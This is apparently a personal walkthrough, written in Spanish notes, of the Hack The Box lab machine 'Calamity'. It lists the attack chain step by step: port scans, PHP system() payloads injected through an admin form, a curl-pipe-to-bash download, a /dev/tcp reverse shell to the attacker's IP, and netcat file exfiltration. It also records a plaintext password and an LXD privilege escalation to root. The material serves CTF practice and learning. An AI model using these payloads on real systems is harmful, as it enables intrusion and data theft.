Calamity
HTB Linux
whichSystem.py 10.129.213.125

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.213.125 -oG allPorts

extractPorts allPorts

nmap -sCV -p22,80 10.129.213.125 -oN targeted

whatweb http://10.129.213.125

nmap --script http-enum -p80 10.129.213.125 -oN webScan -Pn

https://10.129.213.125

nmap --script http-enum -p80 10.129.213.125 -oN WebScan

Buscamos en http://10.129.213.125/uploads

Buscamos en http://10.129.213.125/admin.php


Metemos lo siguiente en el formulario
<?php system("whoami"); ?>
Despliega www-data

<?php system("curl 10.10.14.157 | bash"); ?>
nc -lvnp 443
Creamos un archivo index.html con el codigo en la imagen y iniciamos un servidor en python
touch index.html
python3 -m http.server 80

cat fakeShell.sh

rlwrap ./fakeShell.sh

cp /bin/bash /dev/shm/cu3rv0x

/dev/shm/cu3rv0x -c '/dev/shm/cu3rv0x -i &> /dev/tcp/10.10.14.157/443 0>&1'
nc -lvnp 443


#transfer_files
cp /bin/nc /dev/shm/transfer
/dev/shm/transfer 10.10.14.157 443 < recov.wav
nc -lvnp 443 > recov.wav

/dev/shm/transfer 10.10.14.157 443 < rick.wav
nc -lvnp 443 > recov.wav
md5sum rick.wav recov.wav

play /home/cu3rv0x/message.wav
/usr/bin/script -qc /bin/bash /dev/null
Conseguimos las siguientes credenciales:
su xalvas
18547936..*

uname -a

En tu kali
searchsploit lxd
searchsploit -m 46978
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

chmod +x build-alpine
./build-alpine -a i686

chmod +x lxd privesc.sh
dos2unix lxd_privesc.sh

python3 -m http.server 80

En el servidor hacemos lo siguiente:
cd /dev/shm
wget http://10.10.14.157/lxd_privesc.sh
wget http://10.10.14.157/alpine-v3.19-i686-20240306_1835.tar.gz

chmod +x lxd_privesc.sh
./lxd_privesc.sh -f alpine-v3.19-i686-20240306_1835.tar.gz

Borrar linea 21:

./lxd_privesc.sh -f alpine-v3.19-i686-20240306_1835.tar.gz

cd /
cd mnt
cd root
cat root.txt

